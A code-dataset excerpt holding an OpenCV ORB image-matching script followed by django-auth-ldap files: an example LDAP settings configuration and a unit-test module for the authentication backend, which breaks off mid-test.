images\n![Football](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/fb.PNG)\n![HCV](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/hcv.png)\n![Raspberry Pi](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/raspberry.PNG)\n![Ronaldo](https://github.com/RahulDevadiga/Key-point-matching-Image-Processing/blob/master/output/ronaldo.PNG)\n" }, { "alpha_fraction": 0.6417021155357361, "alphanum_fraction": 0.7012766003608704, "avg_line_length": 25.5238094329834, "blob_id": "9f08dab991028fc9a240ce204b421418a1f6207d", "content_id": "f6e9dea4f06c578ebba62885db17051115d0720f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1175, "license_type": "no_license", "max_line_length": 98, "num_lines": 42, "path": "/temp_match_sim.py", "repo_name": "RahulDevadiga/Key-point-matching-Image-Processing", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport os\nimport time\n\n#input images to be compared \nimg1='img/ron1.jpg'\nimg2='img/ron2.jpg'\n\n#orb oriented fast and rotated brief\norb = cv2.ORB_create()\n\nimg1 = cv2.imread(img1,0)\nimg2 = cv2.imread(img2,0)\n\t\nimg1 = cv2.resize(img1, (600,600), interpolation = cv2.INTER_AREA)\nimg2 = cv2.resize(img2, (600,600), interpolation = cv2.INTER_AREA)\n\t\t\n#to find key points and descriptors for each image\nkp1, des1 = orb.detectAndCompute(img1,None)\nkp2, des2 = orb.detectAndCompute(img2,None)\n\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) #crosscheck is true will give best matching\n\nmatches = bf.match(des1,des2)\nmatches = sorted(matches,key=lambda x:x.distance)\n\t\t\ntop=5\n#to show the output image\nmatchimg = cv2.drawMatches(img1, kp1, img2, kp2, matches[:top], None)\n#to find the distance between images \nsums=0\nfor m in matches:\n\tsums+=m.distance\nimg3 = cv2.resize(matchimg, (1200,600), interpolation = cv2.INTER_AREA)\ncv2.imshow(\"img3\",img3)\ncv2.imwrite(\"op.png\", img3)\n\nprint(\"average distance of first and second image is \",sums/top)\n\t\ncv2.waitKey(0)\ncv2.destroyAllWindows(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" } ]
2
django-auth-ldap/django-auth-ldap
https://github.com/django-auth-ldap/django-auth-ldap
9c6abd3d52b8332ae184c6152011840a12c46503
1008d9fe16c0e6cfe3c9ad3b84e190204b182749
5fb5290306c2725240aa47ae75b7310c50cd0479
refs/heads/master
2023-08-17T16:27:45.890091
2023-08-08T15:28:22
2023-08-08T15:32:24
126,738,464
322
109
BSD-2-Clause
2018-03-25T20:43:34
2023-09-02T01:13:26
2023-09-05T08:36:14
Python
[ { "alpha_fraction": 0.676554262638092, "alphanum_fraction": 0.6781796216964722, "avg_line_length": 35.19117736816406, "blob_id": "5b63c0e15b5d2103dd4e43b364b0834231c4b91a", "content_id": "8744e0b6c26e4418b52a8369874c578d1d908758", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2461, "license_type": "permissive", "max_line_length": 80, "num_lines": 68, "path": "/docs/example.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Example Configuration\n=====================\n\nHere is a complete example configuration from :file:`settings.py` that\nexercises nearly all of the features. In this example, we're authenticating\nagainst a global pool of users in the directory, but we have a special area set\naside for Django groups (``ou=django,ou=groups,dc=example,dc=com``). Remember\nthat most of this is optional if you just need simple authentication. Some\ndefault settings and arguments are included for completeness.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n\n # Baseline configuration.\n AUTH_LDAP_SERVER_URI = \"ldap://ldap.example.com\"\n\n AUTH_LDAP_BIND_DN = \"cn=django-agent,dc=example,dc=com\"\n AUTH_LDAP_BIND_PASSWORD = \"phlebotinum\"\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n \"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n # Or:\n # AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=users,dc=example,dc=com'\n\n # Set up the basic group parameters.\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n \"ou=django,ou=groups,dc=example,dc=com\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType(name_attr=\"cn\")\n\n # Simple group restrictions\n AUTH_LDAP_REQUIRE_GROUP = \"cn=enabled,ou=django,ou=groups,dc=example,dc=com\"\n AUTH_LDAP_DENY_GROUP = \"cn=disabled,ou=django,ou=groups,dc=example,dc=com\"\n\n # Populate the Django user from the LDAP directory.\n AUTH_LDAP_USER_ATTR_MAP = {\n \"first_name\": \"givenName\",\n \"last_name\": \"sn\",\n \"email\": \"mail\",\n }\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=django,ou=groups,dc=example,dc=com\",\n \"is_staff\": \"cn=staff,ou=django,ou=groups,dc=example,dc=com\",\n \"is_superuser\": \"cn=superuser,ou=django,ou=groups,dc=example,dc=com\",\n }\n\n # This is the default, but I like to be explicit.\n AUTH_LDAP_ALWAYS_UPDATE_USER = True\n\n # Use LDAP group membership to calculate group permissions.\n AUTH_LDAP_FIND_GROUP_PERMS = True\n\n # Cache distinguished names and group memberships for an hour to minimize\n # LDAP traffic.\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n # Keep ModelBackend around for per-user permissions and maybe a local\n # superuser.\n AUTHENTICATION_BACKENDS = (\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n )\n" }, { "alpha_fraction": 0.5798587203025818, "alphanum_fraction": 0.5815887451171875, "avg_line_length": 35.95307922363281, "blob_id": "6f3fd99b93b860d2aba3502cd7a5eddf43927b7c", "content_id": "326bcabcec6245718a21368ff194fbed4243d6f0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63010, "license_type": "permissive", "max_line_length": 88, "num_lines": 1705, "path": "/tests/tests.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport contextlib\nimport functools\nimport logging\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom unittest import mock\n\nimport ldap\nimport slapdtest\nfrom django.contrib.auth import authenticate, get_backends\nfrom django.contrib.auth.models import Group, Permission, User\nfrom django.core.cache import cache\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom django_auth_ldap.backend import LDAPBackend, ldap_error, populate_user\nfrom django_auth_ldap.config import (\n GroupOfNamesType,\n LDAPGroupQuery,\n LDAPSearch,\n LDAPSearchUnion,\n MemberDNGroupType,\n NestedMemberDNGroupType,\n PosixGroupType,\n)\n\nfrom .models import TestUser\n\n\ndef get_backend():\n backends = get_backends()\n return backends[0]\n\n\ndef _override_settings(**settings):\n def decorator(func):\n @functools.wraps(func)\n def wrapped_test(self, *args, **kwargs):\n cm = override_settings(**settings)\n cm.enable()\n self.addCleanup(cm.disable)\n return func(self, *args, **kwargs)\n\n return wrapped_test\n\n return decorator\n\n\ndef spy_ldap(name):\n \"\"\"\n Patch the python-ldap method. The patched method records all calls and\n passes execution to the original method.\n \"\"\"\n ldap_method = getattr(ldap.ldapobject.SimpleLDAPObject, name)\n ldap_mock = mock.MagicMock()\n\n @functools.wraps(ldap_method)\n def wrapped_ldap_method(self, *args, **kwargs):\n ldap_mock(*args, **kwargs)\n return ldap_method(self, *args, **kwargs)\n\n def decorator(test):\n @functools.wraps(test)\n def wrapped_test(self, *args, **kwargs):\n with mock.patch.object(\n ldap.ldapobject.SimpleLDAPObject, name, wrapped_ldap_method\n ):\n return test(self, ldap_mock, *args, **kwargs)\n\n return wrapped_test\n\n return decorator\n\n\[email protected]\ndef catch_signal(signal):\n \"\"\"Catch Django signal and return the mocked call.\"\"\"\n handler = mock.Mock()\n signal.connect(handler)\n try:\n yield handler\n finally:\n signal.disconnect(handler)\n\n\nclass LDAPTest(TestCase):\n @classmethod\n def configure_logger(cls):\n logger = logging.getLogger(\"django_auth_ldap\")\n formatter = logging.Formatter(\"LDAP auth - %(levelname)s - %(message)s\")\n handler = logging.StreamHandler()\n\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n logger.setLevel(logging.CRITICAL)\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.configure_logger()\n\n here = os.path.dirname(__file__)\n cls.server = slapdtest.SlapdObject()\n cls.server.suffix = \"o=test\"\n cls.server.openldap_schema_files = [\n \"core.ldif\",\n \"cosine.ldif\",\n \"inetorgperson.ldif\",\n \"nis.ldif\",\n \"msuser.ldif\",\n ]\n cls.server.start()\n with open(os.path.join(here, \"tests.ldif\")) as fp:\n ldif = fp.read()\n cls.server.slapadd(ldif)\n\n @classmethod\n def tearDownClass(cls):\n cls.server.stop()\n super().tearDownClass()\n\n def setUp(self):\n super().setUp()\n cache.clear()\n\n def test_options(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n CONNECTION_OPTIONS={ldap.OPT_REFERRALS: 0},\n )\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.ldap_user.connection.get_option(ldap.OPT_REFERRALS), 0)\n\n def test_callable_server_uri(self):\n request = RequestFactory().get(\"/\")\n cb_mock = mock.Mock(return_value=self.server.ldap_uri)\n\n self._init_settings(\n SERVER_URI=lambda request: cb_mock(request),\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n )\n user_count = User.objects.count()\n\n user = authenticate(request=request, username=\"alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n cb_mock.assert_called_with(request)\n\n def test_simple_bind(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"uid=alice,ou=people,o=test\",)),\n (\"Creating Django user %s\", (\"alice\",)),\n (\"Populating Django user %s\", (\"alice\",)),\n ],\n )\n\n def test_default_settings(self):\n class MyBackend(LDAPBackend):\n default_settings = {\n \"SERVER_URI\": self.server.ldap_uri,\n \"USER_DN_TEMPLATE\": \"uid=%(user)s,ou=people,o=test\",\n }\n\n backend = MyBackend()\n\n user_count = User.objects.count()\n\n user = backend.authenticate(None, username=\"alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n @_override_settings(\n AUTHENTICATION_BACKENDS=[\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n )\n def test_login_with_multiple_auth_backends(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n\n @_override_settings(\n AUTHENTICATION_BACKENDS=[\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n )\n def test_bad_login_with_multiple_auth_backends(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user = authenticate(username=\"invalid\", password=\"i_do_not_exist\")\n self.assertIsNone(user)\n\n def test_username_none(self):\n self._init_settings()\n user = authenticate(username=None, password=\"password\")\n self.assertIsNone(user)\n\n @spy_ldap(\"simple_bind_s\")\n def test_simple_bind_escaped(self, mock):\n \"\"\"Bind with a username that requires escaping.\"\"\"\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"alice,1\", password=\"password\")\n\n self.assertIsNone(user)\n mock.assert_called_once_with(\"uid=alice\\\\,1,ou=people,o=test\", \"password\")\n\n def test_new_user_lowercase(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"Alice\", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n def test_deepcopy(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"Alice\", password=\"password\")\n user = deepcopy(user)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_auth_custom_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n )\n\n user = authenticate(username=\"Alice\", password=\"password\")\n\n self.assertIsInstance(user, TestUser)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_get_custom_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n )\n\n backend = get_backend()\n user = authenticate(username=\"Alice\", password=\"password\")\n user = backend.get_user(user.id)\n\n self.assertIsInstance(user, TestUser)\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_get_custom_field(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"uid_number\": \"uidNumber\"},\n USER_QUERY_FIELD=\"uid_number\",\n )\n alice = TestUser.objects.create(identifier=\"abcdef\", uid_number=1000)\n user = authenticate(username=\"Alice\", password=\"password\")\n self.assertIsInstance(user, TestUser)\n self.assertEqual(user.pk, alice.pk)\n\n def test_new_user_whitespace(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\" alice\", password=\"password\")\n user = authenticate(username=\"alice \", password=\"password\")\n\n self.assertIs(user.has_usable_password(), False)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), user_count + 1)\n\n def test_simple_bind_bad_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"evil_alice\", password=\"password\")\n self.assertIsNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n log1, log2 = logs.records\n self.assertEqual(log1.msg, \"Binding as %s\")\n self.assertEqual(log1.args, (\"uid=evil_alice,ou=people,o=test\",))\n self.assertEqual(log2.levelname, \"DEBUG\")\n self.assertEqual(log2.msg, \"Authentication failed for %s: %s\")\n username, exc = log2.args\n self.assertEqual(username, \"evil_alice\")\n self.assertEqual(exc.args, (\"user DN/password rejected by LDAP server.\",))\n\n def test_simple_bind_bad_password(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"bogus\")\n\n self.assertIsNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n def test_existing_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n User.objects.create(username=\"alice\")\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n # Make sure we only created one user\n self.assertIsNotNone(user)\n self.assertEqual(User.objects.count(), user_count)\n\n def test_existing_user_insensitive(self):\n base_dn = \"ou=people,o=test\"\n filters = \"(uid=%(user)s)\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(base_dn, ldap.SCOPE_SUBTREE, filters)\n )\n User.objects.create(username=\"alice\")\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"Alice\", password=\"password\")\n self.assertIsNotNone(user)\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(User.objects.count(), 1)\n\n dn = \"uid=alice,ou=people,o=test\"\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"\",)),\n (\"Invoking search_s('%s', %s, '%s')\", (base_dn, 2, \"(uid=Alice)\")),\n (\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n (base_dn, 2, filters, 1, dn),\n ),\n (\"Binding as %s\", (dn,)),\n (\"Populating Django user %s\", (\"Alice\",)),\n ],\n )\n\n def test_convert_username(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n class MyBackend(LDAPBackend):\n def ldap_to_django_username(self, username):\n return \"ldap_%s\" % username\n\n def django_to_ldap_username(self, username):\n return username[5:]\n\n backend = MyBackend()\n user_count = User.objects.count()\n\n user1 = backend.authenticate(None, username=\"alice\", password=\"password\")\n user2 = backend.get_user(user1.pk)\n\n self.assertEqual(User.objects.count(), user_count + 1)\n self.assertEqual(user1.username, \"ldap_alice\")\n self.assertEqual(user1.ldap_user._username, \"alice\")\n self.assertEqual(user1.ldap_username, \"alice\")\n self.assertEqual(user2.username, \"ldap_alice\")\n self.assertEqual(user2.ldap_user._username, \"alice\")\n self.assertEqual(user2.ldap_username, \"alice\")\n\n def test_search_bind(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n user_count = User.objects.count()\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(user)\n self.assertEqual(User.objects.count(), user_count + 1)\n\n @spy_ldap(\"search_s\")\n def test_search_bind_escaped(self, mock):\n \"\"\"Search for a username that requires escaping.\"\"\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice*\", password=\"password\")\n\n self.assertIsNone(user)\n mock.assert_called_once_with(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice\\\\2a)\", None\n )\n\n def test_search_bind_no_user(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uidNumber=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_search_bind_multiple_users(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=*)\")\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_search_bind_bad_password(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n\n user = authenticate(username=\"alice\", password=\"bogus\")\n\n self.assertIsNone(user)\n\n def test_search_bind_with_credentials(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"password\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(user)\n self.assertIsNotNone(user.ldap_user)\n self.assertEqual(user.ldap_user.dn, \"uid=alice,ou=people,o=test\")\n self.assertEqual(\n dict(user.ldap_user.attrs),\n {\n \"objectClass\": [\n \"person\",\n \"organizationalPerson\",\n \"inetOrgPerson\",\n \"posixAccount\",\n ],\n \"cn\": [\"alice\"],\n \"uid\": [\"alice\"],\n \"userPassword\": [\"password\"],\n \"uidNumber\": [\"1000\"],\n \"gidNumber\": [\"1000\"],\n \"givenName\": [\"Alice\"],\n \"sn\": [\"Adams\"],\n \"homeDirectory\": [\"/home/alice\"],\n },\n )\n\n def test_search_bind_with_bad_credentials(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNone(user)\n\n def test_unicode_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"dreßler\", password=\"password\")\n self.assertIsNotNone(user)\n self.assertEqual(user.username, \"dreßler\")\n self.assertEqual(user.last_name, \"Dreßler\")\n\n def test_cidict(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsInstance(user.ldap_user.attrs, ldap.cidict.cidict)\n\n def test_populate_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n\n def test_populate_user_with_missing_attribute(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\n \"first_name\": \"givenName\",\n \"last_name\": \"sn\",\n \"email\": \"mail\",\n },\n )\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n self.assertEqual(user.email, \"\")\n dn = \"uid=alice,ou=people,o=test\"\n self.assertEqual(\n [(log.levelname, log.msg, log.args) for log in logs.records],\n [\n (\"DEBUG\", \"Binding as %s\", (dn,)),\n (\"DEBUG\", \"Creating Django user %s\", (\"alice\",)),\n (\"DEBUG\", \"Populating Django user %s\", (\"alice\",)),\n (\"DEBUG\", \"Binding as %s\", (\"\",)),\n (\n \"DEBUG\",\n \"Invoking search_s('%s', %s, '%s')\",\n (dn, 0, \"(objectClass=*)\"),\n ),\n (\n \"DEBUG\",\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n (dn, 0, \"(objectClass=*)\", 1, dn),\n ),\n (\n \"WARNING\",\n \"%s does not have a value for the attribute %s\",\n (dn, \"mail\"),\n ),\n ],\n )\n\n @mock.patch.object(LDAPSearch, \"execute\", return_value=None)\n def test_populate_user_with_bad_search(self, mock_execute):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"\")\n self.assertEqual(user.last_name, \"\")\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_authenticate_with_buggy_setter_raises_exception(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"uid_number\": \"uidNumber\"},\n )\n\n with self.assertRaisesMessage(Exception, \"Oops...\"):\n authenticate(username=\"alice\", password=\"password\")\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_populate_user_with_buggy_setter_raises_exception(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"uid_number\": \"uidNumber\"},\n )\n\n backend = get_backend()\n with self.assertRaisesMessage(Exception, \"Oops...\"):\n backend.populate_user(\"alice\")\n\n @spy_ldap(\"search_s\")\n def test_populate_with_attrlist(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n USER_ATTRLIST=[\"*\", \"+\"],\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n\n # lookup user attrs\n mock.assert_called_once_with(\n \"uid=alice,ou=people,o=test\", ldap.SCOPE_BASE, \"(objectClass=*)\", [\"*\", \"+\"]\n )\n\n def test_bind_as_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n BIND_AS_AUTHENTICATING_USER=True,\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n\n def test_bind_as_user_with_dn_refetch(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"%(user)[email protected]\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n BIND_AS_AUTHENTICATING_USER=True,\n REFRESH_DN_ON_BIND=True,\n )\n\n # need override to mimic Microsoft AD bind\n # since openldap does not accepts UPN for login\n def _bind_as(_self, bind_dn, bind_password, sticky=False):\n _self._get_connection().simple_bind_s(\n \"cn=charlie_cooper,ou=people,o=test\", bind_password\n )\n _self._connection_bound = sticky\n\n with mock.patch(\"django_auth_ldap.backend._LDAPUser._bind_as\", _bind_as):\n user = authenticate(username=\"charlie\", password=\"password\")\n\n self.assertEqual(user.username, \"charlie\")\n self.assertEqual(user.first_name, \"Charlie\")\n self.assertEqual(user.last_name, \"Cooper\")\n self.assertEqual(user.ldap_user.dn, \"cn=charlie_cooper,ou=people,o=test\")\n\n def test_signal_populate_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n with catch_signal(populate_user) as handler:\n user = authenticate(username=\"alice\", password=\"password\")\n handler.assert_called_once_with(\n signal=populate_user,\n sender=LDAPBackend,\n user=user,\n ldap_user=user.ldap_user,\n )\n\n def test_auth_signal_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n def handle_ldap_error(sender, **kwargs):\n raise kwargs[\"exception\"]\n\n with catch_signal(ldap_error) as handler:\n handler.side_effect = handle_ldap_error\n request = RequestFactory().get(\"/\")\n with self.assertRaises(ldap.LDAPError):\n authenticate(request=request, username=\"alice\", password=\"password\")\n handler.assert_called_once()\n _args, kwargs = handler.call_args\n self.assertEqual(kwargs[\"context\"], \"authenticate\")\n self.assertEqual(kwargs[\"request\"], request)\n\n def test_populate_signal_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n backend = get_backend()\n user = backend.populate_user(\"alice\")\n\n 